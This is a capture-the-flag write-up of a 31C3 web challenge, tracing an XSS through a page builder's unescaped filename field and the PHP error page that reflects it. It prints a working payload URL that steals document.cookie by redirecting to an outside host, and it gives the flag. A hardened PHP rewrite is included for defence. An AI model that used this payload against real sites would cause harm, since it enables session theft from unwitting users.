This challenge only needs XSS, but it was interesting to me 🙂

These guys have ripped off our designs and are using them in their web page builder! We’d Haxx them, don’t worry we’ll give you decent points for it. http://188.40.18.76/

[Screenshot 2015-01-02 8.40.09]

Using the form, we can generate a page (such as http://188.40.18.76/output/19c94d778563b117e18e3442e887989aea14277d/filename).

The generator applies htmlspecialchars to “title” and “file content”, but not to “style” or “filename”.

The maximum size of “style” is 8 bytes and that of “filename” is 65 bytes.

So “filename” can be foo.php and “style” can be <?php a, so that the generated file is executed as PHP and shows a parse error.

(http://188.40.18.76/output/19c94d778563b117e18e3442e887989aea14277d/foo.php)

Parse error: syntax error, unexpected '" rel="' (T_CONSTANT_ENCAPSED_STRING) in /var/www/html/output/19c94d778563b117e18e3442e887989aea14277d/foo.php on line 10

Hmm… PHP code execution looks difficult, because the maximum size of “style” is 8 bytes, short_open_tag is off, and * is removed from “title” and “file content”.

So let’s look for another vulnerability.

We can XSS via “filename”, because the error page above prints “filename” unescaped!

http://188.40.18.76/output/19c94d778563b117e18e3442e887989aea14277d/%3Cbody onload=%22eval%28location.hash.slice%281%29%29%22.php#location.href=%27http://tyage.net/%27+document.cookie

(Note: we put the code in location.hash to fit within the maximum length of “filename”.)
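For comparison, here is how the page-builder step could be written so that neither of the two issues above (an executable “filename” and an unescaped “style”) exists. This is an added example, not the challenge’s own code; the field names, the page template and OUTPUT_DIR are assumptions, while the two length limits come from the writeup.

```php
<?php
// Added example (not the challenge's own code): a hardened version of the
// page-builder step the writeup describes. Field names, OUTPUT_DIR and the
// page template are assumptions; the two length limits come from the writeup.
const OUTPUT_DIR   = '/var/www/html/output'; // the path shown in the error message
const MAX_STYLE    = 8;
const MAX_FILENAME = 65;

// HTML-escape every user-controlled value placed in HTML, not only title/content.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Filename: conservative charset, one optional extension, and the extension is
// always replaced by .html, so a "foo.php" name is never executed by PHP.
function safeFilename(string $name): ?string {
    if (strlen($name) > MAX_FILENAME || !preg_match('/^[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?$/', $name)) {
        return null;
    }
    return pathinfo($name, PATHINFO_FILENAME) . '.html';
}

// Style lands inside <style>, where entities are not decoded, so an allowlist is
// safer than escaping: no '<', '&', '?' or other markup characters get through.
function safeStyle(string $style): ?string {
    if (strlen($style) > MAX_STYLE || !preg_match('/^[A-Za-z0-9 #:;.,%-]*$/', $style)) {
        return null;
    }
    return $style;
}

function buildPage(string $title, string $style, string $content): string {
    return '<!DOCTYPE html><html><head><title>' . h($title) . '</title>'
         . '<style>' . $style . '</style></head>'
         . '<body>' . h($content) . '</body></html>';
}

$filename = safeFilename((string)($_POST['filename'] ?? ''));
$style    = safeStyle((string)($_POST['style'] ?? ''));
if ($filename === null || $style === null) {
    http_response_code(400);
    exit('Invalid filename or style.'); // generic message: never reflect the raw input
}
$dir = OUTPUT_DIR . '/' . bin2hex(random_bytes(20));
if (!mkdir($dir, 0755, true)) {
    exit('Could not create output directory.');
}
file_put_contents($dir . '/' . $filename, buildPage(
    (string)($_POST['title'] ?? ''), $style, (string)($_POST['content'] ?? '')
));
```

As defence in depth, serve the output directory with PHP execution disabled in the web server configuration and keep display_errors off (log_errors on) in production, so a parse error can never reflect a user-controlled path back into a page.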

Now, just submit the link above in the contact form and we capture the flag!

31c3_Y0u_H4v3_F0und_My_W34k_Err0R_P01n7